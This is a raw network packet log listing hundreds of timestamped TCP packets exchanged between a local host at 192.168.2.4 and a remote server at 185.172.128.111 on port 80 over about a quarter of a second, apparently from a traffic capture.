Apr 23, 2024 09:27:03.486534119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486560106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486594915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486607075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486607075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486630917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486640930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486665964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486680031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486701965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486721039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486737013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486763954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486772060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486784935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486808062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486826897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486843109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486865044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486880064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486916065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486917019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486936092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486951113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.486965895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.486987114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487001896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487024069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487040043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487059116 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487076998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487093925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487112045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487129927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487149000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487164021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487169027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487201929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487219095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487236977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487257004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487273932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487308979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487318993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487318993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487344027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487350941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487380028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487389088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487415075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487440109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487449884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487464905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487488031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487498999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487524986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487533092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487560034 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487572908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487596035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487606049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487632036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487646103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487668037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487689018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487704039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487716913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487740040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487775087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487799883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487799883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487809896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487828970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487844944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487855911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487879992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487893105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487915993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487924099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487951040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.487967968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.487986088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488007069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488022089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488037109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488056898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488074064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488092899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488152027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488167048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488167048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488188028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488193035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488224983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488234997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488260031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488276958 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488295078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488315105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488329887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488354921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488367081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488384962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488405943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488421917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488441944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488456964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488478899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488513947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488517046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488537073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488549948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488560915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488585949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488621950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488636971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488636971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488658905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488666058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488694906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488712072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488734961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488744974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488770008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488779068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488805056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488818884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488842010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488857031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488878012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488893986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488914013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488931894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488950014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.488967896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.488984108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489018917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489021063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489043951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489057064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489067078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489092112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489101887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489128113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489137888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489162922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489181995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489200115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489203930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489236116 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489269018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489270926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489286900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489305973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489322901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489341974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489362001 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489376068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489397049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489412069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489427090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489449024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489483118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489484072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489501953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489520073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489541054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489553928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489567995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489589930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489605904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489625931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489644051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489660978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489681005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489696026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489712000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489732027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489752054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489767075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489789009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489803076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489839077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489840031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489864111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489875078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489887953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489909887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489932060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489944935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.489955902 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.489981890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.490012884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.490017891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.490045071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.490055084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.490062952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.490092039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.490111113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.490125895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.490154982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.490163088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.490180969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.490200043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.490210056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.490236044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.490247011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.490292072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696063995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696140051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696170092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696180105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696221113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696238041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696238041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696260929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696268082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696297884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696321011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696341991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696356058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696392059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696413994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696427107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696440935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696465969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696496010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696501970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696515083 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696540117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696554899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696593046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696595907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696629047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696645021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696667910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696687937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696705103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696718931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696739912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696753979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696775913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696791887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696811914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696832895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696849108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696863890 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696887016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696922064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696929932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696958065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.696959019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.696995020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697000980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697000980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697030067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697042942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697067022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697087049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697103024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697114944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697139978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697148085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697179079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697189093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697213888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697227955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697251081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697267056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697287083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697302103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697324038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697345018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697360992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697386980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697396994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697406054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697433949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697452068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697470903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697489023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697505951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697527885 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697540998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697551966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697577000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697592020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697616100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697629929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697653055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697690964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697690964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697714090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697726965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697742939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697762966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697777987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697799921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697815895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697835922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697855949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697870970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697894096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697906971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697917938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697943926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697958946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.697979927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.697999954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698018074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698034048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698055983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698071957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698095083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698107004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698132038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698148966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698168039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698178053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698204994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698214054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698242903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698261976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698277950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698312998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698323011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698323011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698349953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698362112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698385954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698394060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698421955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698457003 CEST	80	49730	185.172.128.111	192.168.2.4
